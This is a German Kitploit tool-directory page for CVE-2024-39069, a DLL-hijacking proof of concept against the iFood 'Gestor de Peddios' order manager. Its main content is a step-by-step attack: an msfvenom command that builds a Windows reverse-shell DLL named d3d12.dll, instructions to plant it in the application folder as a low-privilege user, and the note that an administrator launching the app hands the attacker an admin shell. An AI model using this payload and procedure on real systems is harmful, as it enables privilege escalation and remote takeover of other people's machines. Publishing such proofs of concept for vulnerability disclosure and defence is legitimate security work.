Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-39069 — CVE-2024-39069 | Kitploit
Tools/GitHubGitHub/aungsoepaing/cve-2024-39069
Privilege EscalationPayload-GenerierungExploitationShellcodePenetrationstestsBinary-Exploitation
GitHubaungsoepaing/cve-2024-39069

CVE-2024-39069

CVE-2024-39069

Repository anzeigen
2vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ifood Order Manager 'Gestor de Peddios.exe' - DLL-Hijacking

Ein Angreifer platziert eine schädliche DLL namens "d3d12.dll" in einem Verzeichnis, das von der Anwendung durchsucht wird, bevor die legitime "d3d12.dll" gefunden wird. Wenn die Anwendung gestartet wird, lädt sie die schädliche DLL anstelle der legitimen, was es dem Angreifer ermöglicht, beliebigen Code im Kontext der Anwendung auszuführen.

Anbieter-Homepage: https://gestordepedidos.ifood.com.br/

Google Drive: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing

POC video: https://youtu.be/oMIobV2M0T8

POC

  1. Erstellen Sie eine schädliche DLL-Datei auf Kali Linux mit msfvenom

    root@kitploit:~
    msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
    
  2. Übertragen Sie die erstellte 'd3d12.dll' auf den Windows-Host von Kali aus als Benutzer mit niedrigen Berechtigungen

  3. Verschieben Sie die erstellte 'd3d12.dll'-Datei nach 'C:\Gestor de Peddios\d3d12.dll' als Benutzer mit niedrigen Berechtigungen

  4. Wenn der Administrator die Anwendung ausführt, erhalten Sie eine Reverse-Shell als Administrator

Tool herunterladen